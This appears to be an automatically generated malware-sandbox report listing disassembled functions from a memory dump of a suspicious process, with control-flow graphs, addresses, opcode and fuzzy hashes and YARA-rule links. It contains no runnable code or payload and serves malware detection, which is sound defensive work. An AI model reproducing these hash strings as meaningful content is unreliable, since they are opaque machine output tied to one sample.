                                                                                                                                control_flow_graph 163 7ffd9b771575-7ffd9b7715df 165 7ffd9b7715e1 163->165 166 7ffd9b7715e6 call 7ffd9b7712b0 163->166 165->166 168 7ffd9b7715eb-7ffd9b7715f8 166->168 170 7ffd9b7715fb-7ffd9b7715ff 168->170 171 7ffd9b771601-7ffd9b7716a6 call 7ffd9b7704f8 170->171 172 7ffd9b77161c-7ffd9b771626 170->172 171->170 179 7ffd9b7716ac-7ffd9b7716b3 171->179 179->170
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b770000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 0-3372436214
                                                                                                                                • Opcode ID: 40b21f57d55898f4138911b400373ed7b8aba144a7096d37ef1bae04adfe6387
                                                                                                                                • Instruction ID: 3821dd242034927140389451890d4a73a1815051c749bab46ca6c08f55b84216
                                                                                                                                • Opcode Fuzzy Hash: 40b21f57d55898f4138911b400373ed7b8aba144a7096d37ef1bae04adfe6387
                                                                                                                                • Instruction Fuzzy Hash: 0E210436B0D69A8BD712AAA4DC202E9B770EF42321F0546B7C164C71D2DB342219CB91
                                                                                                                                Function 00007FFD9B771588 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 180 7ffd9b771588-7ffd9b7715df 182 7ffd9b7715e1 180->182 183 7ffd9b7715e6 call 7ffd9b7712b0 180->183 182->183 185 7ffd9b7715eb-7ffd9b7715f8 183->185 187 7ffd9b7715fb-7ffd9b7715ff 185->187 188 7ffd9b771601-7ffd9b7716a6 call 7ffd9b7704f8 187->188 189 7ffd9b77161c-7ffd9b771626 187->189 188->187 196 7ffd9b7716ac-7ffd9b7716b3 188->196 196->187
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b770000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 0-3372436214
                                                                                                                                • Opcode ID: ea254d372d3cb2c36a13fd0b1760ed7dae3f56606ea3de082d523ca3c00f835b
                                                                                                                                • Instruction ID: bc12eb2cc6ec0c3b315f5fd47f52a61d937b3e6f633de46727da4e8636669a38
                                                                                                                                • Opcode Fuzzy Hash: ea254d372d3cb2c36a13fd0b1760ed7dae3f56606ea3de082d523ca3c00f835b
                                                                                                                                • Instruction Fuzzy Hash: 3811E235B0D79A8FD702ABB4C8202E9B770EF42311F0546B6C154C71E2DA386219CB91
                                                                                                                                Function 00007FFD9B771598 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 197 7ffd9b771598-7ffd9b7715df 199 7ffd9b7715e1 197->199 200 7ffd9b7715e6 call 7ffd9b7712b0 197->200 199->200 202 7ffd9b7715eb-7ffd9b7715f8 200->202 204 7ffd9b7715fb-7ffd9b7715ff 202->204 205 7ffd9b771601-7ffd9b7716a6 call 7ffd9b7704f8 204->205 206 7ffd9b77161c-7ffd9b771626 204->206 205->204 213 7ffd9b7716ac-7ffd9b7716b3 205->213 213->204
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b770000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 0-3372436214
                                                                                                                                • Opcode ID: f1240b001709095292a1ea8b3251757a10a46368ecb1954b9b30b6932cf8a6a7
                                                                                                                                • Instruction ID: 764bc5aefd04056d3e5dc608434c775a2d44c794ac51a479ca2071a909fb7f71
                                                                                                                                • Opcode Fuzzy Hash: f1240b001709095292a1ea8b3251757a10a46368ecb1954b9b30b6932cf8a6a7
                                                                                                                                • Instruction Fuzzy Hash: AD11E134A0D79A8FD712ABA4C8647E97B70EF02311F0546B6C415CB1E6DA786218CB91
                                                                                                                                Function 00007FFD9B7715A0 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 218 7ffd9b7715a0-7ffd9b7715df 220 7ffd9b7715e1 218->220 221 7ffd9b7715e6 call 7ffd9b7712b0 218->221 220->221 223 7ffd9b7715eb-7ffd9b7715f8 221->223 225 7ffd9b7715fb-7ffd9b7715ff 223->225 226 7ffd9b771601-7ffd9b7716a6 call 7ffd9b7704f8 225->226 227 7ffd9b77161c-7ffd9b771626 225->227 226->225 234 7ffd9b7716ac-7ffd9b7716b3 226->234 234->225
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b770000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 0-3372436214
                                                                                                                                • Opcode ID: 3ddc4b120807f13d7397180231392ba1ec1cb5a8dc02359f41a69fc69ab54150
                                                                                                                                • Instruction ID: 877a3f262ae57eec08646df4274b45ef958c41ff163486aceb0721f5cc3f2bf0
                                                                                                                                • Opcode Fuzzy Hash: 3ddc4b120807f13d7397180231392ba1ec1cb5a8dc02359f41a69fc69ab54150
                                                                                                                                • Instruction Fuzzy Hash: 7301DE34E0D39A8FD712ABA4C8647E97BB0EF02310F0946B6C4158B1E7DE782618CB91
                                                                                                                                Function 00007FFD9B770A19 Relevance: .3, Instructions: 283COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b770000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d7f02711899a27a96f1f7d8a0be9c63ba799386c3c6baac0bb9169e09818f128
                                                                                                                                • Instruction ID: b8ac1d193185ec2fd4de625740cda289cd5284019e859c4945cfeed57b5a98cb
                                                                                                                                • Opcode Fuzzy Hash: d7f02711899a27a96f1f7d8a0be9c63ba799386c3c6baac0bb9169e09818f128
                                                                                                                                • Instruction Fuzzy Hash: 25712715B1EB4E0AEB786ABC08A53B976C2DB85B14F26027DD4DFC32E3DC5C69034241
                                                                                                                                Function 00007FFD9B78DE85 Relevance: .2, Instructions: 240COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1dd2321b59455ebfbbccc2c379a5a37efce11f763767e431e95ae2a3b537bad6
                                                                                                                                • Instruction ID: 99d6e2628c0945069557a1d14046c66c119d55eea25f4def891f95167c35d2c3
                                                                                                                                • Opcode Fuzzy Hash: 1dd2321b59455ebfbbccc2c379a5a37efce11f763767e431e95ae2a3b537bad6
                                                                                                                                • Instruction Fuzzy Hash: 99914170E19A5D8FEB94DB98C8A57ACB7F2FF58301F1446B9D01CD32A2DA3469848B41
                                                                                                                                Function 00007FFD9B78DF03 Relevance: .2, Instructions: 216COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 208025a266433dfe80bc893a57de87300703866bb6ed59ec414d993ef1ccf3d2
                                                                                                                                • Instruction ID: 62806604ae98e683fff7b301638c6c6530c84b3a7e47562bbc4522c78698955b
                                                                                                                                • Opcode Fuzzy Hash: 208025a266433dfe80bc893a57de87300703866bb6ed59ec414d993ef1ccf3d2
                                                                                                                                • Instruction Fuzzy Hash: 53812270A19A5D8FEB94EF98C8A57ACB7F1FF58301F1446B9D00CD32A6DE3469848B41
                                                                                                                                Function 00007FFD9B770870 Relevance: .2, Instructions: 163COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b770000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4d7e7556e8df5e6fe6f134bcae6d804c16ce464aeae5f6def2df0298b9179492
                                                                                                                                • Instruction ID: 5a44547b44eebf7d44bebcd2efd256b64f314714a35068dd78ac2a3a3e8ce5a2
                                                                                                                                • Opcode Fuzzy Hash: 4d7e7556e8df5e6fe6f134bcae6d804c16ce464aeae5f6def2df0298b9179492
                                                                                                                                • Instruction Fuzzy Hash: 52511B31B1DB584FDB64DF7884946AA7BE1FF59301F0501BAE09AC32B2DE649C018B41
                                                                                                                                Function 00007FFD9B7780CB Relevance: .1, Instructions: 123COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b770000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0ff1a74a740d40f2ca625e2fe4030811c9f3c1ae6bc09c08c3386016670be2bc
                                                                                                                                • Instruction ID: 27861116543c4427633ea9051843ccac51cd1f451d834ad717ef8d426f590aa0
                                                                                                                                • Opcode Fuzzy Hash: 0ff1a74a740d40f2ca625e2fe4030811c9f3c1ae6bc09c08c3386016670be2bc
                                                                                                                                • Instruction Fuzzy Hash: 6A51A870E0961C8EEBA4DF18C894AE9B7B5EB58301F1042EAD00DE3260DF755A85CF41
                                                                                                                                Function 00007FFD9B788F2D Relevance: .1, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B787000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B787000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b787000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b7d7c6a17d867d7663f6792a8ba1ad36922ed1e1362cca8883755e6b817b4944
                                                                                                                                • Instruction ID: dba043ed4e5305b9462aff662e4140eec9f2a3d7fbfd04883f03b890da86bd98
                                                                                                                                • Opcode Fuzzy Hash: b7d7c6a17d867d7663f6792a8ba1ad36922ed1e1362cca8883755e6b817b4944
                                                                                                                                • Instruction Fuzzy Hash: 0521C131A09A4D8FDB14DF98D8A16ED77F2FF59311F04027AD44AE32A1CA346A15CB81
                                                                                                                                Function 00007FFD9B770CB9 Relevance: .1, Instructions: 81COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b770000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7221af66b32e300b7d43ae0132089cb1d1aff4891e2606f558dcdf6799d8e1d4
                                                                                                                                • Instruction ID: f743003680eb8b1aa02ee4e1bfb9b8ab1b37ec8b19c6a1cd76731a39ddf14fb7
                                                                                                                                • Opcode Fuzzy Hash: 7221af66b32e300b7d43ae0132089cb1d1aff4891e2606f558dcdf6799d8e1d4
                                                                                                                                • Instruction Fuzzy Hash: E2218751B0E75A06EB79557C6CB12B57BE1DF85600F1902BEE49AC32F3ED8CAA0563C0
                                                                                                                                Function 00007FFD9B771EBD Relevance: .1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b770000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 76f55ee9aec2abdd38bb77ed02b496684b66810a4c4c7a879144e916d2203f5d
                                                                                                                                • Instruction ID: a30ebac17323fb6d9c6df6b27762b089bc5cca6ddf9714cd4094cf0eb8e06b21
                                                                                                                                • Opcode Fuzzy Hash: 76f55ee9aec2abdd38bb77ed02b496684b66810a4c4c7a879144e916d2203f5d
                                                                                                                                • Instruction Fuzzy Hash: 7221E930A18A1E8FDB94EFA8C8949ADB3F1FF68341B11067AD419D36A1DF74A945CB40
                                                                                                                                Function 00007FFD9B791A65 Relevance: .1, Instructions: 62COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0474a60053bbbbf335ef7a3c3b932d5cee39a61fdad9f4909ac00ea4b74a593e
                                                                                                                                • Instruction ID: 47a6983222606411014877e7e1e22eba0f5e41aa89d3228fabb312f03cf881b8
                                                                                                                                • Opcode Fuzzy Hash: 0474a60053bbbbf335ef7a3c3b932d5cee39a61fdad9f4909ac00ea4b74a593e
                                                                                                                                • Instruction Fuzzy Hash: FE117931A08A4D8FCF44EF58C899AEE7BB0FF68305F0105AAE459C3261DB30A550CB81
                                                                                                                                Function 00007FFD9B78EF3B Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 11ac3a1155e455014d7349824bd9e28e4434bcd56b8a04c89c09fadee58eedd3
                                                                                                                                • Instruction ID: 739dd6e259ee324c80a45c82aac44544ae2aa017ff8b8e1d29e5f129976deeaf
                                                                                                                                • Opcode Fuzzy Hash: 11ac3a1155e455014d7349824bd9e28e4434bcd56b8a04c89c09fadee58eedd3
                                                                                                                                • Instruction Fuzzy Hash: 7111EF70E09A1D8FDBA4DF94C8A47ACB7B1FB54311F1046A5D00DD3265DB386A85CB40
                                                                                                                                Function 00007FFD9B774AC1 Relevance: .0, Instructions: 47COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b770000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 742f56c7cd84d7bd9a23f23189715f2ac847372154e9b1ec387524d539e02760
                                                                                                                                • Instruction ID: ca551be671b09bb44bfcc910044b6f884dea62860d91a5bc1d1ff0e9ae3f9837
                                                                                                                                • Opcode Fuzzy Hash: 742f56c7cd84d7bd9a23f23189715f2ac847372154e9b1ec387524d539e02760
                                                                                                                                • Instruction Fuzzy Hash: 62111C30E0561E8FEB64EB54C8947E8B3F0FF54305F4142E5E04DA21A1DE781A85CF84
                                                                                                                                Function 00007FFD9B776FC5 Relevance: .0, Instructions: 24COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b770000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5ae1cbdc57ef04daeed5c47ae9338d361964d1466e15a7463f1f54462e4cab1e
                                                                                                                                • Instruction ID: 5b34e731826611a2c6aa04f271113bbb1654d22664960cc0572ba44a766ff7ad
                                                                                                                                • Opcode Fuzzy Hash: 5ae1cbdc57ef04daeed5c47ae9338d361964d1466e15a7463f1f54462e4cab1e
                                                                                                                                • Instruction Fuzzy Hash: 4DF01970F1971D8ADB68DF5888617E8B6A1FF55300F1101F9E00ED3292CD781AC04B46
                                                                                                                                Function 00007FFD9B790C45 Relevance: .0, Instructions: 24COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 27230450e8a7e77f2c2cd74ce05a9b3636f0261b2f7c2e8b76a0bad6b9540f09
                                                                                                                                • Instruction ID: e211e0f896a8f9cfc77c83d10a8f6c661b7b87ed6dc1bc55c8366b227217f3dd
                                                                                                                                • Opcode Fuzzy Hash: 27230450e8a7e77f2c2cd74ce05a9b3636f0261b2f7c2e8b76a0bad6b9540f09
                                                                                                                                • Instruction Fuzzy Hash: D7F0B730E2A75DCEEB609AA488583ECB2A0AF19701F110276C41D962B1DB386A81CA00